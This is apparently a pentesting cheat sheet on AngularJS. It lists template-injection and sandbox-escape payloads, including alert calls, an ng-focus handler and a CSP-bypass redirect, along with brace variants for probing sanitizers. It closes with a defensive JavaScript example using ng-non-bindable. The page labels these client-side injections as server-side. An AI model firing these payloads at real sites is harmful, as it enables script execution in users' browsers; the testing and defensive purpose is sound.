# Angular Pentesting

AngularJS is a web application framework.

### HTML Attributes <a href="#html-attributes" id="html-attributes"></a>

If a website uses the AngularJS framework, its HTML contains an `ng-app` attribute (the directive that bootstraps the application), so you can check for it in the HTML source code.

```
<div ng-app>
```

### Server-Side Template Injection (SSTI) <a href="#server-side-template-injection-ssti" id="server-side-template-injection-ssti"></a>

```
{{2*3}}
{{$on.constructor('alert("test")')()}}
{{constructor.constructor('alert("test")')()}}
<input ng-focus=$event.view.alert('test')>

<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```

It is worth testing whether the sanitizer can be bypassed with variants of the expression syntax, such as the following.

```
# Remove one-pair braces
{2*3}

# Remove all braces
2*3

# Add additional braces
{{{2*3}}}
```
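Why the `{{...}}` payloads above survive ordinary output encoding, and one mitigation, as an added JavaScript example that is not from the original page. It assumes a server that reflects a user-supplied search term into a page whose body is an AngularJS `ng-app`; AngularJS evaluates interpolation in the browser after the HTML has been parsed, so HTML-escaping alone does not stop it, while `ng-non-bindable` does. The `wouldInterpolate` helper is a simplified, hypothetical check written for this example.

```javascript
// Added example (not from the original page). Assumed scenario: a server
// echoes a search term into a page whose body is an AngularJS ng-app.

const ANGULAR_INTERPOLATION = /\{\{[\s\S]*?\}\}/;

// Standard HTML escaping. Note what it does NOT touch: braces.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// Vulnerable render: HTML-escaped input placed inside the ng-app scope.
// AngularJS interpolates text nodes after the browser parses the HTML, so
// "{{2*3}}" survives escaping and is evaluated as an expression. Encoding
// the braces as entities does not help either: AngularJS reads the decoded
// DOM text, where the braces are back.
function renderVulnerable(term) {
  return `<div ng-app>You searched for: ${escapeHtml(term)}</div>`;
}

// Hardened render: the untrusted text is additionally wrapped in an element
// carrying ng-non-bindable, which tells AngularJS not to compile it.
function renderHardened(term) {
  return `<div ng-app>You searched for: <span ng-non-bindable>${escapeHtml(term)}</span></div>`;
}

// Simplified defender-side check (hypothetical helper): does the reflected
// term carry an interpolation marker that AngularJS would evaluate, i.e. it
// contains {{...}} and sits outside any ng-non-bindable element?
function wouldInterpolate(html, term) {
  if (!ANGULAR_INTERPOLATION.test(term)) return false;
  const idx = html.indexOf(escapeHtml(term));
  if (idx === -1) return false;
  const before = html.slice(0, idx);
  // Protected only if the nearest enclosing tag before the text is ng-non-bindable.
  return !/ng-non-bindable[^>]*>[^<]*$/.test(before);
}
```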
